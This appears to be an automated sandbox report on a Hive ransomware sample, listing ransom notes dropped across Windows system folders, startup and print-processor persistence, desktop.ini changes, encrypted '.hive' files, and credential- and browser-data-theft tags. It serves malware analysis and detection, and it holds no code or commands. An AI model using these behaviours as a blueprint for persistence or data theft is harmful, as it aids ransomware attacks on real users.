File created	C:\Windows\SysWOW64\drivers\de-DE\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\drivers\UMDF\de-DE\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\drivers\etc\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\drivers\UMDF\en-US\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\drivers\en-US\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\drivers\UMDF\de-DE\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\drivers\it-IT\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\drivers\UMDF\es-ES\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\drivers\en-US\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\drivers\UMDF\ja-JP\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\drivers\it-IT\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\drivers\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\drivers\es-ES\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\drivers\fr-FR\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\drivers\ja-JP\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\drivers\UMDF\ja-JP\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\drivers\UMDF\it-IT\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\drivers\ja-JP\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\drivers\UMDF\fr-FR\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\drivers\de-DE\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\drivers\es-ES\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\drivers\fr-FR\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A

Boot or Logon Autostart Execution: Print Processors

persistence

Description	Indicator	Process	Target
File created	C:\Windows\System32\spool\prtprocs\x64\ja-JP\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\spool\prtprocs\x64\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\spool\prtprocs\x64\de-DE\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\spool\prtprocs\x64\en-US\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\spool\prtprocs\x64\es-ES\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\spool\prtprocs\x64\fr-FR\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\spool\prtprocs\x64\it-IT\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description	Indicator	Process	Target
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.2bFe2RNXl41EgVSI0NCD79mtp4bWMw5hTIxI97N3WUM.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Drops desktop.ini file(s)

Description	Indicator	Process	Target
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Public\Videos\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Documents\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\TWVGEE8A\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Public\Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\$Recycle.Bin\S-1-5-21-2212144002-1172735686-1556890956-1000\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Public\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Searches\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CGY9ZAGI\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U42VY3XA\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Public\Downloads\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4NH6FMWO\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-2212144002-1172735686-1556890956-1000\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VUPQHL12\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Links\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Public\Desktop\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Public\Documents\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\OORJZY5Z\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A

Drops file in System32 directory

Description	Indicator	Process	Target
File created	C:\Windows\System32\en-US\Licenses\eval\HomePremium\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\ja-JP\Licenses\OEM\StarterE\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\de-DE\Licenses\_Default\Starter\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\sysprep\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\elxstor.inf_amd64_neutral_4263942b9dfe9077\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\lsi_fc.inf_amd64_neutral_a7088f3644ca646a\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\prnep003.inf_amd64_neutral_92ed2d842e0dd4ea\Amd64\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\Printing_Admin_Scripts\es-ES\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\en-US\Licenses\eval\HomeBasicE\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\Tasks\Microsoft\Windows\Defrag\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\es-ES\Licenses\_Default\HomePremiumN\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\prnlx00e.inf_amd64_neutral_0a4797d9b127d3a7\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\es-ES\Licenses\eval\HomeBasicN\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\spp\tokens\channels\OCUR\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\es-ES\Licenses\_Default\ProfessionalN\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\prnep00d.inf_amd64_neutral_dd61103f3a2743d4\Amd64\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\prnnr002.inf_amd64_neutral_37896c5e81c8d488\Amd64\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\SMI\Schema\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\Tasks\Microsoft\Windows\Power Efficiency Diagnostics\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\es-ES\Licenses\eval\Ultimate\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\it-IT\Licenses\_Default\Professional\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\mdmetech.inf_amd64_neutral_230358eeb58f0b3b\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\mdmmcd.inf_amd64_neutral_49212f5920298e45\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\prnbr002.inf_amd64_neutral_db1d8c9efda9b3c0\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\en-US\Licenses\OEM\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\de-DE\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\0411\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\mdmarch.inf_amd64_neutral_4261401e3170ebfb\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\prnxx002.inf_amd64_neutral_560fdd891b24f384\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\wialx004.inf_amd64_neutral_0a3a62ae6ed43127\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\prnhp004.inf_amd64_neutral_53f688945cfc24cc\Amd64\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\ws3cap.inf_amd64_neutral_eeaccb8f1560f5fb\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\migwiz\dlmanifests\Microsoft-Windows-NetworkLoadBalancing-Core\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\it-IT\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\es-ES\Licenses\_Default\Enterprise\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\hpoa1nd.inf_amd64_neutral_cf39c48277e038de\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\de-DE\Licenses\OEM\ProfessionalN\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\pl-PL\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\de\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\SysWOW64\migwiz\replacementmanifests\microsoft-windows-ndis\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\ja-JP\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\LogFiles\Fax\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\cxraptor_fm1236mk5_ibv64.inf_amd64_neutral_b81bec917adfaea5\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\it-IT\Licenses\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\DriverStore\FileRepository\prnso002.inf_amd64_neutral_c3b7ce4e6f71641f\Amd64\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\de-DE\Licenses\_Default\HomePremium\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File created	C:\Windows\System32\wbem\Logs\HOW_TO_DECRYPT.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
